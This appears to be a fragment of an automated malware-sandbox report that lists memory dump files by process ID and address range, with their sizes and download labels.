memory/4352-287-0x0000000009140000-0x000000000929B000-memory.dmp

Filesize
1.4MB

Download
memory/4352-275-0x0000000004540000-0x0000000004541000-memory.dmp

Filesize
4KB

Download
memory/4352-276-0x0000000004542000-0x0000000004543000-memory.dmp

Filesize
4KB

Download
memory/4352-270-0x00000000078D0000-0x00000000078D1000-memory.dmp

Filesize
4KB

Download
memory/4352-284-0x00000000096D0000-0x00000000096D1000-memory.dmp

Filesize
4KB

Download
memory/4352-286-0x0000000004543000-0x0000000004544000-memory.dmp

Filesize
4KB

Download
memory/4448-655-0x0000000000000000-mapping.dmp

Download
memory/4456-681-0x0000000000000000-mapping.dmp

Download
memory/4460-676-0x000000000047B92E-mapping.dmp

Download
memory/4460-683-0x0000000005240000-0x000000000573E000-memory.dmp

Filesize
5.0MB

Download
memory/4492-601-0x0000000000000000-mapping.dmp

Download
memory/4568-279-0x00000000033C0000-0x00000000033C9000-memory.dmp

Filesize
36KB

Download
memory/4568-274-0x0000000000000000-mapping.dmp

Download
memory/4568-277-0x00000000033D0000-0x00000000033D5000-memory.dmp

Filesize
20KB

Download
memory/4684-300-0x0000000004390000-0x0000000004391000-memory.dmp

Filesize
4KB

Download
memory/4684-288-0x0000000000000000-mapping.dmp

Download
memory/4684-326-0x0000000004393000-0x0000000004394000-memory.dmp

Filesize
4KB

Download
memory/4684-325-0x000000007F350000-0x000000007F351000-memory.dmp

Filesize
4KB

Download
memory/4684-301-0x0000000004392000-0x0000000004393000-memory.dmp

Filesize
4KB

Download
memory/4712-631-0x0000000000000000-mapping.dmp

Download
memory/4724-627-0x0000000000000000-mapping.dmp

Download
memory/4804-629-0x0000000000000000-mapping.dmp

Download
memory/4812-618-0x0000000000FD0000-0x0000000000FD1000-memory.dmp

Filesize
4KB

Download
memory/4812-613-0x00000000004565FE-mapping.dmp

Download
memory/4828-610-0x0000000000000000-mapping.dmp

Download
memory/4896-685-0x0000000000000000-mapping.dmp

Download
memory/4896-694-0x0000000004B80000-0x000000000507E000-memory.dmp

Filesize
5.0MB

Download
memory/4924-620-0x0000000000000000-mapping.dmp

Download
memory/4932-658-0x0000000000000000-mapping.dmp

Download
memory/4972-624-0x0000000000000000-mapping.dmp

Download
memory/5016-550-0x0000000000000000-mapping.dmp

Download
memory/5024-633-0x0000000000000000-mapping.dmp

Download
memory/5052-635-0x0000000000000000-mapping.dmp

Download
memory/5060-637-0x0000000000000000-mapping.dmp

Download
memory/5104-647-0x0000000000000000-mapping.dmp

Download
memory/5108-373-0x0000000000400000-0x0000000000495000-memory.dmp

Filesize
596KB

Download
memory/5108-370-0x000000000044003F-mapping.dmp

Download